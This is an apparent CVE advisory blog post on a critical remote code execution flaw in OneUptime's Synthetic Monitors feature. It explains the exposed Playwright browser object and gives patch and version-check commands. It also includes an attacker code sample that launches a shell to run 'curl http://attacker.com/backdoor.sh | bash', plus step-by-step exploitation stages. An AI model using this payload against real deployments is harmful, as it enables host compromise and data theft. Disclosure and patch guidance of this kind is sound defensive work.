OneUptime, Remote Code Execution, CVE-2026-30921 (Critical)

Listen to this Post

How This CVE Works

OneUptime versions before 10.0.20 contain a critical Remote Code Execution vulnerability in their Synthetic Monitors feature . Low-privileged project users can submit custom Playwright code that executes on the oneuptime-probe service . The untrusted code runs inside Node’s virtual machine (vm) context but is given live host Playwright objects including browser and page . This creates a unique server-side RCE primitive where attackers don’t need traditional sandbox escape techniques like `this.constructor.constructor(…)` . Instead, attackers directly use the injected Playwright browser object to call `browser.browserType().launch(…)` . This method spawns arbitrary executables on the probe host or container . The vulnerability stems from exposing dangerous host capabilities rather than prototype-chain access . Any OneUptime deployment where an attacker can gain ordinary project membership is at risk . The vulnerability carries a CVSS score of 9.9 (Critical) with vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H . It is classified under CWE-749 . The vulnerability was publicly disclosed on March 10, 2026 . The fix is implemented in version 10.0.20 .

dailycve form

Platform: OneUptime
Version: <10.0.20
Vulnerability: RCE
Severity: Critical
Date: 2026-03-10

Prediction: Patch available

What Undercode Say:

Analytics

  • CVSS Score: 9.9 Critical
  • Attack Vector: Network
  • Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope: Changed
  • CWE: 749
  • EPSS: 0.01% probability

Bash Commands and Codes

Check current version:

Check OneUptime package version
npm list @oneuptime/common
Or check package.json
cat package.json | grep oneuptime

Malicious Playwright code example:

// Attacker-submitted code to exploit CVE-2026-30921
const { browser } = await import('playwright');
// Direct access to browser object injected by vulnerable vm context
browser.browserType().launch({
executablePath: '/bin/sh',
args: ['-c', 'curl http://attacker.com/backdoor.sh | bash']
});

Update to patched version:

Update to secure version
npm install @oneuptime/[email protected]
For Docker deployments
docker pull oneuptime/probe:10.0.20
docker-compose up -d

How Exploit

1. Attacker gains low-privileged project access

2. Creates synthetic monitor with custom Playwright code

  1. Code runs in vm context with exposed browser object

4. Calls `browser.browserType().launch()`

5. Specifies arbitrary executable path

6. Executes commands on probe host/container

Protection from this CVE

  • Update to OneUptime version 10.0.20 immediately
  • Review and restrict project membership access
  • Monitor for suspicious synthetic monitor creations
  • Use package-lock.json scanning tools to detect vulnerable versions

Impact

  • Full remote code execution on probe service
  • Complete host/container compromise
  • Data theft potential
  • Internal network pivoting capability
  • All OneUptime instances pre-10.0.20 vulnerable

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top